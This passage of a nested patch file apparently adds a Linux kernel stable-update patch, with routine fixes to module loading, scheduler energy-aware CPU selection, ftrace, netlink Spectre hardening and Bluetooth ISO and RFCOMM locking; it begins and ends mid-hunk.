+-	typeof(observed.lines) expect;
++	typeof(*observed.lines) *expect;
+ 	const char *end;
+ 	char *cur;
+ 	int i;
+@@ -168,6 +168,10 @@ static bool __report_matches(const struct expect_report *r)
+ 	if (!report_available())
+ 		return false;
+ 
++	expect = kmalloc(sizeof(observed.lines), GFP_KERNEL);
++	if (WARN_ON(!expect))
++		return false;
++
+ 	/* Generate expected report contents. */
+ 
+ 	/* Title */
+@@ -253,6 +257,7 @@ static bool __report_matches(const struct expect_report *r)
+ 		strstr(observed.lines[2], expect[1])));
+ out:
+ 	spin_unlock_irqrestore(&observed.lock, flags);
++	kfree(expect);
+ 	return ret;
+ }
+ 
+diff --git a/kernel/module/main.c b/kernel/module/main.c
+index d02d39c7174e1..7a627345d4fd9 100644
+--- a/kernel/module/main.c
++++ b/kernel/module/main.c
+@@ -2386,7 +2386,8 @@ static bool finished_loading(const char *name)
+ 	sched_annotate_sleep();
+ 	mutex_lock(&module_mutex);
+ 	mod = find_module_all(name, strlen(name), true);
+-	ret = !mod || mod->state == MODULE_STATE_LIVE;
++	ret = !mod || mod->state == MODULE_STATE_LIVE
++		|| mod->state == MODULE_STATE_GOING;
+ 	mutex_unlock(&module_mutex);
+ 
+ 	return ret;
+@@ -2562,20 +2563,35 @@ static int add_unformed_module(struct module *mod)
+ 
+ 	mod->state = MODULE_STATE_UNFORMED;
+ 
+-again:
+ 	mutex_lock(&module_mutex);
+ 	old = find_module_all(mod->name, strlen(mod->name), true);
+ 	if (old != NULL) {
+-		if (old->state != MODULE_STATE_LIVE) {
++		if (old->state == MODULE_STATE_COMING
++		    || old->state == MODULE_STATE_UNFORMED) {
+ 			/* Wait in case it fails to load. */
+ 			mutex_unlock(&module_mutex);
+ 			err = wait_event_interruptible(module_wq,
+ 					       finished_loading(mod->name));
+ 			if (err)
+ 				goto out_unlocked;
+-			goto again;
++
++			/* The module might have gone in the meantime. */
++			mutex_lock(&module_mutex);
++			old = find_module_all(mod->name, strlen(mod->name),
++					      true);
+ 		}
+-		err = -EEXIST;
++
++		/*
++		 * We are here only when the same module was being loaded. Do
++		 * not try to load it again right now. It prevents long delays
++		 * caused by serialized module load failures. It might happen
++		 * when more devices of the same type trigger load of
++		 * a particular module.
++		 */
++		if (old && old->state == MODULE_STATE_LIVE)
++			err = -EEXIST;
++		else
++			err = -EBUSY;
+ 		goto out;
+ 	}
+ 	mod_update_bounds(mod);
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 0f32acb05055f..2c3d0d49c80ea 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -7213,11 +7213,11 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	eenv_task_busy_time(&eenv, p, prev_cpu);
+ 
+ 	for (; pd; pd = pd->next) {
++		unsigned long util_min = p_util_min, util_max = p_util_max;
+ 		unsigned long cpu_cap, cpu_thermal_cap, util;
+ 		unsigned long cur_delta, max_spare_cap = 0;
+ 		unsigned long rq_util_min, rq_util_max;
+-		unsigned long util_min, util_max;
+-		bool compute_prev_delta = false;
++		unsigned long prev_spare_cap = 0;
+ 		int max_spare_cap_cpu = -1;
+ 		unsigned long base_energy;
+ 
+@@ -7235,6 +7235,8 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		eenv.pd_cap = 0;
+ 
+ 		for_each_cpu(cpu, cpus) {
++			struct rq *rq = cpu_rq(cpu);
++
+ 			eenv.pd_cap += cpu_thermal_cap;
+ 
+ 			if (!cpumask_test_cpu(cpu, sched_domain_span(sd)))
+@@ -7253,24 +7255,19 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			 * much capacity we can get out of the CPU; this is
+ 			 * aligned with sched_cpu_util().
+ 			 */
+-			if (uclamp_is_used()) {
+-				if (uclamp_rq_is_idle(cpu_rq(cpu))) {
+-					util_min = p_util_min;
+-					util_max = p_util_max;
+-				} else {
+-					/*
+-					 * Open code uclamp_rq_util_with() except for
+-					 * the clamp() part. Ie: apply max aggregation
+-					 * only. util_fits_cpu() logic requires to
+-					 * operate on non clamped util but must use the
+-					 * max-aggregated uclamp_{min, max}.
+-					 */
+-					rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
+-					rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
+-
+-					util_min = max(rq_util_min, p_util_min);
+-					util_max = max(rq_util_max, p_util_max);
+-				}
++			if (uclamp_is_used() && !uclamp_rq_is_idle(rq)) {
++				/*
++				 * Open code uclamp_rq_util_with() except for
++				 * the clamp() part. Ie: apply max aggregation
++				 * only. util_fits_cpu() logic requires to
++				 * operate on non clamped util but must use the
++				 * max-aggregated uclamp_{min, max}.
++				 */
++				rq_util_min = uclamp_rq_get(rq, UCLAMP_MIN);
++				rq_util_max = uclamp_rq_get(rq, UCLAMP_MAX);
++
++				util_min = max(rq_util_min, p_util_min);
++				util_max = max(rq_util_max, p_util_max);
+ 			}
+ 			if (!util_fits_cpu(util, util_min, util_max, cpu))
+ 				continue;
+@@ -7279,18 +7276,19 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 
+ 			if (cpu == prev_cpu) {
+ 				/* Always use prev_cpu as a candidate. */
+-				compute_prev_delta = true;
++				prev_spare_cap = cpu_cap;
+ 			} else if (cpu_cap > max_spare_cap) {
+ 				/*
+ 				 * Find the CPU with the maximum spare capacity
+-				 * in the performance domain.
++				 * among the remaining CPUs in the performance
++				 * domain.
+ 				 */
+ 				max_spare_cap = cpu_cap;
+ 				max_spare_cap_cpu = cpu;
+ 			}
+ 		}
+ 
+-		if (max_spare_cap_cpu < 0 && !compute_prev_delta)
++		if (max_spare_cap_cpu < 0 && prev_spare_cap == 0)
+ 			continue;
+ 
+ 		eenv_pd_busy_time(&eenv, cpus, p);
+@@ -7298,7 +7296,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		base_energy = compute_energy(&eenv, pd, cpus, p, -1);
+ 
+ 		/* Evaluate the energy impact of using prev_cpu. */
+-		if (compute_prev_delta) {
++		if (prev_spare_cap > 0) {
+ 			prev_delta = compute_energy(&eenv, pd, cpus, p,
+ 						    prev_cpu);
+ 			/* CPU utilization has changed */
+@@ -7309,7 +7307,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 		}
+ 
+ 		/* Evaluate the energy impact of using max_spare_cap_cpu. */
+-		if (max_spare_cap_cpu >= 0) {
++		if (max_spare_cap_cpu >= 0 && max_spare_cap > prev_spare_cap) {
+ 			cur_delta = compute_energy(&eenv, pd, cpus, p,
+ 						   max_spare_cap_cpu);
+ 			/* CPU utilization has changed */
+diff --git a/kernel/trace/ftrace.c b/kernel/trace/ftrace.c
+index 33236241f2364..6f726ea0fde01 100644
+--- a/kernel/trace/ftrace.c
++++ b/kernel/trace/ftrace.c
+@@ -1248,12 +1248,17 @@ static void free_ftrace_hash_rcu(struct ftrace_hash *hash)
+ 	call_rcu(&hash->rcu, __free_ftrace_hash_rcu);
+ }
+ 
++/**
++ * ftrace_free_filter - remove all filters for an ftrace_ops
++ * @ops - the ops to remove the filters from
++ */
+ void ftrace_free_filter(struct ftrace_ops *ops)
+ {
+ 	ftrace_ops_init(ops);
+ 	free_ftrace_hash(ops->func_hash->filter_hash);
+ 	free_ftrace_hash(ops->func_hash->notrace_hash);
+ }
++EXPORT_SYMBOL_GPL(ftrace_free_filter);
+ 
+ static struct ftrace_hash *alloc_ftrace_hash(int size_bits)
+ {
+@@ -5828,6 +5833,10 @@ EXPORT_SYMBOL_GPL(modify_ftrace_direct_multi);
+  *
+  * Filters denote which functions should be enabled when tracing is enabled
+  * If @ip is NULL, it fails to update filter.
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
+  */
+ int ftrace_set_filter_ip(struct ftrace_ops *ops, unsigned long ip,
+ 			 int remove, int reset)
+@@ -5847,7 +5856,11 @@ EXPORT_SYMBOL_GPL(ftrace_set_filter_ip);
+  *
+  * Filters denote which functions should be enabled when tracing is enabled
+  * If @ips array or any ip specified within is NULL , it fails to update filter.
+- */
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
++*/
+ int ftrace_set_filter_ips(struct ftrace_ops *ops, unsigned long *ips,
+ 			  unsigned int cnt, int remove, int reset)
+ {
+@@ -5889,6 +5902,10 @@ ftrace_set_regex(struct ftrace_ops *ops, unsigned char *buf, int len,
+  *
+  * Filters denote which functions should be enabled when tracing is enabled.
+  * If @buf is NULL and reset is set, all functions will be enabled for tracing.
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
+  */
+ int ftrace_set_filter(struct ftrace_ops *ops, unsigned char *buf,
+ 		       int len, int reset)
+@@ -5908,6 +5925,10 @@ EXPORT_SYMBOL_GPL(ftrace_set_filter);
+  * Notrace Filters denote which functions should not be enabled when tracing
+  * is enabled. If @buf is NULL and reset is set, all functions will be enabled
+  * for tracing.
++ *
++ * This can allocate memory which must be freed before @ops can be freed,
++ * either by removing each filtered addr or by using
++ * ftrace_free_filter(@ops).
+  */
+ int ftrace_set_notrace(struct ftrace_ops *ops, unsigned char *buf,
+ 			int len, int reset)
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 3076af8dbf32e..546e84ae9993b 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -10291,6 +10291,8 @@ void __init early_trace_init(void)
+ 			static_key_enable(&tracepoint_printk_key.key);
+ 	}
+ 	tracer_alloc_buffers();
++
++	init_events();
+ }
+ 
+ void __init trace_init(void)
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 5581754d97628..9e931f51328a2 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -1490,6 +1490,7 @@ extern void trace_event_enable_cmd_record(bool enable);
+ extern void trace_event_enable_tgid_record(bool enable);
+ 
+ extern int event_trace_init(void);
++extern int init_events(void);
+ extern int event_trace_add_tracer(struct dentry *parent, struct trace_array *tr);
+ extern int event_trace_del_tracer(struct trace_array *tr);
+ extern void __trace_early_add_events(struct trace_array *tr);
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index c6e406995c112..da3bfe8625d96 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -1975,6 +1975,8 @@ static struct hist_field *create_hist_field(struct hist_trigger_data *hist_data,
+ 		hist_field->fn_num = flags & HIST_FIELD_FL_LOG2 ? HIST_FIELD_FN_LOG2 :
+ 			HIST_FIELD_FN_BUCKET;
+ 		hist_field->operands[0] = create_hist_field(hist_data, field, fl, NULL);
++		if (!hist_field->operands[0])
++			goto free;
+ 		hist_field->size = hist_field->operands[0]->size;
+ 		hist_field->type = kstrdup_const(hist_field->operands[0]->type, GFP_KERNEL);
+ 		if (!hist_field->type)
+diff --git a/kernel/trace/trace_osnoise.c b/kernel/trace/trace_osnoise.c
+index 4300c5dc4e5db..1c07efcb3d466 100644
+--- a/kernel/trace/trace_osnoise.c
++++ b/kernel/trace/trace_osnoise.c
+@@ -125,9 +125,8 @@ static void osnoise_unregister_instance(struct trace_array *tr)
+ 	 * register/unregister serialization is provided by trace's
+ 	 * trace_types_lock.
+ 	 */
+-	lockdep_assert_held(&trace_types_lock);
+-
+-	list_for_each_entry_rcu(inst, &osnoise_instances, list) {
++	list_for_each_entry_rcu(inst, &osnoise_instances, list,
++				lockdep_is_held(&trace_types_lock)) {
+ 		if (inst->tr == tr) {
+ 			list_del_rcu(&inst->list);
+ 			found = 1;
+diff --git a/kernel/trace/trace_output.c b/kernel/trace/trace_output.c
+index 67f47ea27921d..5cd4fb6563068 100644
+--- a/kernel/trace/trace_output.c
++++ b/kernel/trace/trace_output.c
+@@ -1568,7 +1568,7 @@ static struct trace_event *events[] __initdata = {
+ 	NULL
+ };
+ 
+-__init static int init_events(void)
++__init int init_events(void)
+ {
+ 	struct trace_event *event;
+ 	int i, ret;
+@@ -1581,4 +1581,3 @@ __init static int init_events(void)
+ 
+ 	return 0;
+ }
+-early_initcall(init_events);
+diff --git a/lib/lockref.c b/lib/lockref.c
+index 45e93ece8ba0d..2afe4c5d89191 100644
+--- a/lib/lockref.c
++++ b/lib/lockref.c
+@@ -23,7 +23,6 @@
+ 		}								\
+ 		if (!--retry)							\
+ 			break;							\
+-		cpu_relax();							\
+ 	}									\
+ } while (0)
+ 
+diff --git a/lib/nlattr.c b/lib/nlattr.c
+index b67a53e29b8fe..dffd60e4065fd 100644
+--- a/lib/nlattr.c
++++ b/lib/nlattr.c
+@@ -10,6 +10,7 @@
+ #include <linux/kernel.h>
+ #include <linux/errno.h>
+ #include <linux/jiffies.h>
++#include <linux/nospec.h>
+ #include <linux/skbuff.h>
+ #include <linux/string.h>
+ #include <linux/types.h>
+@@ -381,6 +382,7 @@ static int validate_nla(const struct nlattr *nla, int maxtype,
+ 	if (type <= 0 || type > maxtype)
+ 		return 0;
+ 
++	type = array_index_nospec(type, maxtype + 1);
+ 	pt = &policy[type];
+ 
+ 	BUG_ON(pt->type > NLA_TYPE_MAX);
+@@ -596,6 +598,7 @@ static int __nla_validate_parse(const struct nlattr *head, int len, int maxtype,
+ 			}
+ 			continue;
+ 		}
++		type = array_index_nospec(type, maxtype + 1);
+ 		if (policy) {
+ 			int err = validate_nla(nla, maxtype, policy,
+ 					       validate, extack, depth);
+diff --git a/mm/compaction.c b/mm/compaction.c
+index ca1603524bbe0..8238e83385a79 100644
+--- a/mm/compaction.c
++++ b/mm/compaction.c
+@@ -1839,6 +1839,7 @@ static unsigned long fast_find_migrateblock(struct compact_control *cc)
+ 					pfn = cc->zone->zone_start_pfn;
+ 				cc->fast_search_fail = 0;
+ 				found_block = true;
++				set_pageblock_skip(freepage);
+ 				break;
+ 			}
+ 		}
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 8aab2e882958c..3c3b79f2e4c03 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -821,6 +821,7 @@ static void terminate_big_destroy(struct hci_dev *hdev, void *data, int err)
+ static int hci_le_terminate_big(struct hci_dev *hdev, u8 big, u8 bis)
+ {
+ 	struct iso_list_data *d;
++	int ret;
+ 
+ 	bt_dev_dbg(hdev, "big 0x%2.2x bis 0x%2.2x", big, bis);
+ 
+@@ -832,8 +833,12 @@ static int hci_le_terminate_big(struct hci_dev *hdev, u8 big, u8 bis)
+ 	d->big = big;
+ 	d->bis = bis;
+ 
+-	return hci_cmd_sync_queue(hdev, terminate_big_sync, d,
+-				  terminate_big_destroy);
++	ret = hci_cmd_sync_queue(hdev, terminate_big_sync, d,
++				 terminate_big_destroy);
++	if (ret)
++		kfree(d);
++
++	return ret;
+ }
+ 
+ static int big_terminate_sync(struct hci_dev *hdev, void *data)
+@@ -858,6 +863,7 @@ static int big_terminate_sync(struct hci_dev *hdev, void *data)
+ static int hci_le_big_terminate(struct hci_dev *hdev, u8 big, u16 sync_handle)
+ {
+ 	struct iso_list_data *d;
++	int ret;
+ 
+ 	bt_dev_dbg(hdev, "big 0x%2.2x sync_handle 0x%4.4x", big, sync_handle);
+ 
+@@ -869,8 +875,12 @@ static int hci_le_big_terminate(struct hci_dev *hdev, u8 big, u16 sync_handle)
+ 	d->big = big;
+ 	d->sync_handle = sync_handle;
+ 
+-	return hci_cmd_sync_queue(hdev, big_terminate_sync, d,
+-				  terminate_big_destroy);
++	ret = hci_cmd_sync_queue(hdev, big_terminate_sync, d,
++				 terminate_big_destroy);
++	if (ret)
++		kfree(d);
++
++	return ret;
+ }
+ 
+ /* Cleanup BIS connection
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index faca701bce2a3..0e2425eb6aa79 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -3838,8 +3838,11 @@ static u8 hci_cc_le_set_cig_params(struct hci_dev *hdev, void *data,
+ 			   conn->handle, conn->link);
+ 
+ 		/* Create CIS if LE is already connected */
+-		if (conn->link && conn->link->state == BT_CONNECTED)
++		if (conn->link && conn->link->state == BT_CONNECTED) {
++			rcu_read_unlock();
+ 			hci_le_create_cis(conn->link);
++			rcu_read_lock();
++		}
+ 
+ 		if (i == rp->num_handles)
+ 			break;
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 8d6c8cbfe1de4..3eec688a88a92 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4703,6 +4703,7 @@ int hci_dev_open_sync(struct hci_dev *hdev)
+ 			hdev->flush(hdev);
+ 
+ 		if (hdev->sent_cmd) {
++			cancel_delayed_work_sync(&hdev->cmd_timer);
+ 			kfree_skb(hdev->sent_cmd);
+ 			hdev->sent_cmd = NULL;
+ 		}
+@@ -6168,20 +6169,13 @@ int hci_get_random_address(struct hci_dev *hdev, bool require_privacy,
+ 
+ static int _update_adv_data_sync(struct hci_dev *hdev, void *data)
+ {
+-	u8 instance = *(u8 *)data;
+-
+-	kfree(data);
++	u8 instance = PTR_ERR(data);
+ 
+ 	return hci_update_adv_data_sync(hdev, instance);
+ }
+ 
+ int hci_update_adv_data(struct hci_dev *hdev, u8 instance)
+ {
+-	u8 *inst_ptr = kmalloc(1, GFP_KERNEL);
+-
+-	if (!inst_ptr)
+-		return -ENOMEM;
+-
+-	*inst_ptr = instance;
+-	return hci_cmd_sync_queue(hdev, _update_adv_data_sync, inst_ptr, NULL);
++	return hci_cmd_sync_queue(hdev, _update_adv_data_sync,
++				  ERR_PTR(instance), NULL);
+ }
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 26db929b97c43..2dabef488eaae 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -261,13 +261,13 @@ static int iso_connect_bis(struct sock *sk)
+ 
+ 	if (!bis_capable(hdev)) {
+ 		err = -EOPNOTSUPP;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/* Fail if out PHYs are marked as disabled */
+ 	if (!iso_pi(sk)->qos.out.phy) {
+ 		err = -EINVAL;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	hcon = hci_connect_bis(hdev, &iso_pi(sk)->dst, iso_pi(sk)->dst_type,
+@@ -275,22 +275,27 @@ static int iso_connect_bis(struct sock *sk)
+ 			       iso_pi(sk)->base);
+ 	if (IS_ERR(hcon)) {
+ 		err = PTR_ERR(hcon);
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	conn = iso_conn_add(hcon);
+ 	if (!conn) {
+ 		hci_conn_drop(hcon);
+ 		err = -ENOMEM;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+-	/* Update source addr of the socket */
+-	bacpy(&iso_pi(sk)->src, &hcon->src);
++	hci_dev_unlock(hdev);
++	hci_dev_put(hdev);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
++
++	/* Update source addr of the socket */
++	bacpy(&iso_pi(sk)->src, &hcon->src);
+ 
+ 	if (hcon->state == BT_CONNECTED) {
+ 		iso_sock_clear_timer(sk);
+@@ -300,7 +305,10 @@ static int iso_connect_bis(struct sock *sk)
+ 		iso_sock_set_timer(sk, sk->sk_sndtimeo);
+ 	}
+ 
+-done:
++	release_sock(sk);
++	return err;
++
++unlock:
+ 	hci_dev_unlock(hdev);
+ 	hci_dev_put(hdev);
+ 	return err;
+@@ -324,13 +332,13 @@ static int iso_connect_cis(struct sock *sk)
+ 
+ 	if (!cis_central_capable(hdev)) {
+ 		err = -EOPNOTSUPP;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/* Fail if either PHYs are marked as disabled */
+ 	if (!iso_pi(sk)->qos.in.phy && !iso_pi(sk)->qos.out.phy) {
+ 		err = -EINVAL;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/* Just bind if DEFER_SETUP has been set */
+@@ -340,7 +348,7 @@ static int iso_connect_cis(struct sock *sk)
+ 				    &iso_pi(sk)->qos);
+ 		if (IS_ERR(hcon)) {
+ 			err = PTR_ERR(hcon);
+-			goto done;
++			goto unlock;
+ 		}
+ 	} else {
+ 		hcon = hci_connect_cis(hdev, &iso_pi(sk)->dst,
+@@ -348,7 +356,7 @@ static int iso_connect_cis(struct sock *sk)
+ 				       &iso_pi(sk)->qos);
+ 		if (IS_ERR(hcon)) {
+ 			err = PTR_ERR(hcon);
+-			goto done;
++			goto unlock;
+ 		}
+ 	}
+ 
+@@ -356,15 +364,20 @@ static int iso_connect_cis(struct sock *sk)
+ 	if (!conn) {
+ 		hci_conn_drop(hcon);
+ 		err = -ENOMEM;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+-	/* Update source addr of the socket */
+-	bacpy(&iso_pi(sk)->src, &hcon->src);
++	hci_dev_unlock(hdev);
++	hci_dev_put(hdev);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
++
++	/* Update source addr of the socket */
++	bacpy(&iso_pi(sk)->src, &hcon->src);
+ 
+ 	if (hcon->state == BT_CONNECTED) {
+ 		iso_sock_clear_timer(sk);
+@@ -377,7 +390,10 @@ static int iso_connect_cis(struct sock *sk)
+ 		iso_sock_set_timer(sk, sk->sk_sndtimeo);
+ 	}
+ 
+-done:
++	release_sock(sk);
++	return err;
++
++unlock:
+ 	hci_dev_unlock(hdev);
+ 	hci_dev_put(hdev);
+ 	return err;
+@@ -831,20 +847,23 @@ static int iso_sock_connect(struct socket *sock, struct sockaddr *addr,
+ 	bacpy(&iso_pi(sk)->dst, &sa->iso_bdaddr);
+ 	iso_pi(sk)->dst_type = sa->iso_bdaddr_type;
+ 
++	release_sock(sk);
++
+ 	if (bacmp(&iso_pi(sk)->dst, BDADDR_ANY))
+ 		err = iso_connect_cis(sk);
+ 	else
+ 		err = iso_connect_bis(sk);
+ 
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
+ 
+ 	if (!test_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) {
+ 		err = bt_sock_wait_state(sk, BT_CONNECTED,
+ 					 sock_sndtimeo(sk, flags & O_NONBLOCK));
+ 	}
+ 
+-done:
+ 	release_sock(sk);
+ 	return err;
+ }
+@@ -1099,28 +1118,22 @@ static int iso_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct iso_pinfo *pi = iso_pi(sk);
+-	int err;
+ 
+ 	BT_DBG("sk %p", sk);
+ 
+-	lock_sock(sk);
+-
+ 	if (test_and_clear_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) {
+ 		switch (sk->sk_state) {
+ 		case BT_CONNECT2:
++			lock_sock(sk);
+ 			iso_conn_defer_accept(pi->conn->hcon);
+ 			sk->sk_state = BT_CONFIG;
+ 			release_sock(sk);
+ 			return 0;
+ 		case BT_CONNECT:
+-			err = iso_connect_cis(sk);
+-			release_sock(sk);
+-			return err;
++			return iso_connect_cis(sk);
+ 		}
+ 	}
+ 
+-	release_sock(sk);
+-
+ 	return bt_sock_recvmsg(sock, msg, len, flags);
+ }
+ 
+@@ -1415,33 +1428,29 @@ static void iso_conn_ready(struct iso_conn *conn)
+ 	struct sock *parent;
+ 	struct sock *sk = conn->sk;
+ 	struct hci_ev_le_big_sync_estabilished *ev;
++	struct hci_conn *hcon;
+ 
+ 	BT_DBG("conn %p", conn);
+ 
+ 	if (sk) {
+ 		iso_sock_ready(conn->sk);
+ 	} else {
+-		iso_conn_lock(conn);
+-
+-		if (!conn->hcon) {
+-			iso_conn_unlock(conn);
++		hcon = conn->hcon;
++		if (!hcon)
+ 			return;
+-		}
+ 
+-		ev = hci_recv_event_data(conn->hcon->hdev,
++		ev = hci_recv_event_data(hcon->hdev,
+ 					 HCI_EVT_LE_BIG_SYNC_ESTABILISHED);
+ 		if (ev)
+-			parent = iso_get_sock_listen(&conn->hcon->src,
+-						     &conn->hcon->dst,
++			parent = iso_get_sock_listen(&hcon->src,
++						     &hcon->dst,
+ 						     iso_match_big, ev);
+ 		else
+-			parent = iso_get_sock_listen(&conn->hcon->src,
++			parent = iso_get_sock_listen(&hcon->src,
+ 						     BDADDR_ANY, NULL, NULL);
+ 
+-		if (!parent) {
+-			iso_conn_unlock(conn);
++		if (!parent)
+ 			return;
+-		}
+ 
+ 		lock_sock(parent);
+ 
+@@ -1449,30 +1458,29 @@ static void iso_conn_ready(struct iso_conn *conn)
+ 				    BTPROTO_ISO, GFP_ATOMIC, 0);
+ 		if (!sk) {
+ 			release_sock(parent);
+-			iso_conn_unlock(conn);
+ 			return;
+ 		}
+ 
+ 		iso_sock_init(sk, parent);
+ 
+-		bacpy(&iso_pi(sk)->src, &conn->hcon->src);
+-		iso_pi(sk)->src_type = conn->hcon->src_type;
++		bacpy(&iso_pi(sk)->src, &hcon->src);
++		iso_pi(sk)->src_type = hcon->src_type;
+ 
+ 		/* If hcon has no destination address (BDADDR_ANY) it means it
+ 		 * was created by HCI_EV_LE_BIG_SYNC_ESTABILISHED so we need to
+ 		 * initialize using the parent socket destination address.
+ 		 */
+-		if (!bacmp(&conn->hcon->dst, BDADDR_ANY)) {
+-			bacpy(&conn->hcon->dst, &iso_pi(parent)->dst);
+-			conn->hcon->dst_type = iso_pi(parent)->dst_type;
+-			conn->hcon->sync_handle = iso_pi(parent)->sync_handle;
++		if (!bacmp(&hcon->dst, BDADDR_ANY)) {
++			bacpy(&hcon->dst, &iso_pi(parent)->dst);
++			hcon->dst_type = iso_pi(parent)->dst_type;
++			hcon->sync_handle = iso_pi(parent)->sync_handle;
+ 		}
+ 
+-		bacpy(&iso_pi(sk)->dst, &conn->hcon->dst);
+-		iso_pi(sk)->dst_type = conn->hcon->dst_type;
++		bacpy(&iso_pi(sk)->dst, &hcon->dst);
++		iso_pi(sk)->dst_type = hcon->dst_type;
+ 
+-		hci_conn_hold(conn->hcon);
+-		__iso_chan_add(conn, sk, parent);
++		hci_conn_hold(hcon);
++		iso_chan_add(conn, sk, parent);
+ 
+ 		if (test_bit(BT_SK_DEFER_SETUP, &bt_sk(parent)->flags))
+ 			sk->sk_state = BT_CONNECT2;
+@@ -1483,8 +1491,6 @@ static void iso_conn_ready(struct iso_conn *conn)
+ 		parent->sk_data_ready(parent);
+ 
+ 		release_sock(parent);
+-
+-		iso_conn_unlock(conn);
+ 	}
+ }
+ 
+diff --git a/net/bluetooth/mgmt_util.h b/net/bluetooth/mgmt_util.h
+index 6a8b7e84293df..bdf978605d5a8 100644
+--- a/net/bluetooth/mgmt_util.h
++++ b/net/bluetooth/mgmt_util.h
+@@ -27,7 +27,7 @@ struct mgmt_mesh_tx {
+ 	struct sock *sk;
+ 	u8 handle;
+ 	u8 instance;
+-	u8 param[sizeof(struct mgmt_cp_mesh_send) + 29];
++	u8 param[sizeof(struct mgmt_cp_mesh_send) + 31];
+ };
+ 
+ struct mgmt_pending_cmd {
+diff --git a/net/bluetooth/rfcomm/sock.c b/net/bluetooth/rfcomm/sock.c
+index 21e24da4847f0..4397e14ff560f 100644
+--- a/net/bluetooth/rfcomm/sock.c
++++ b/net/bluetooth/rfcomm/sock.c
+@@ -391,6 +391,7 @@ static int rfcomm_sock_connect(struct socket *sock, struct sockaddr *addr, int a
+ 	    addr->sa_family != AF_BLUETOOTH)
+ 		return -EINVAL;
+ 
++	sock_hold(sk);
+ 	lock_sock(sk);
+ 
+ 	if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+@@ -410,14 +411,18 @@ static int rfcomm_sock_connect(struct socket *sock, struct sockaddr *addr, int a
+ 	d->sec_level = rfcomm_pi(sk)->sec_level;
+ 	d->role_switch = rfcomm_pi(sk)->role_switch;
+ 
++	/* Drop sock lock to avoid potential deadlock with the RFCOMM lock */
++	release_sock(sk);
+ 	err = rfcomm_dlc_open(d, &rfcomm_pi(sk)->src, &sa->rc_bdaddr,
+ 			      sa->rc_channel);
+-	if (!err)
++	lock_sock(sk);
++	if (!err && !sock_flag(sk, SOCK_ZAPPED))
+ 		err = bt_sock_wait_state(sk, BT_CONNECTED,
+ 				sock_sndtimeo(sk, flags & O_NONBLOCK));
+ 
+ done:
+ 	release_sock(sk);
++	sock_put(sk);
+ 	return err;
+ }
+ 
+diff --git a/net/core/net_namespace.c b/net/core/net_namespace.c
+index f64654df71a29..4c1707d0eb9b0 100644
+--- a/net/core/net_namespace.c
++++ b/net/core/net_namespace.c
+@@ -137,12 +137,12 @@ static int ops_init(const struct pernet_operations *ops, struct net *net)
+ 		return 0;
+ 
+ 	if (ops->id && ops->size) {
+-cleanup:
+ 		ng = rcu_dereference_protected(net->gen,
+ 					       lockdep_is_held(&pernet_ops_rwsem));
+ 		ng->ptr[*ops->id] = NULL;
+ 	}
+ 
++cleanup:
+ 	kfree(data);
+ 
+ out:
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index ce9ff3c62e840..3bb890a40ed73 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -30,6 +30,7 @@
+ #include <linux/slab.h>
+ #include <linux/netlink.h>
+ #include <linux/hash.h>
++#include <linux/nospec.h>
+ 
+ #include <net/arp.h>
+ #include <net/inet_dscp.h>
+@@ -1022,6 +1023,7 @@ bool fib_metrics_match(struct fib_config *cfg, struct fib_info *fi)
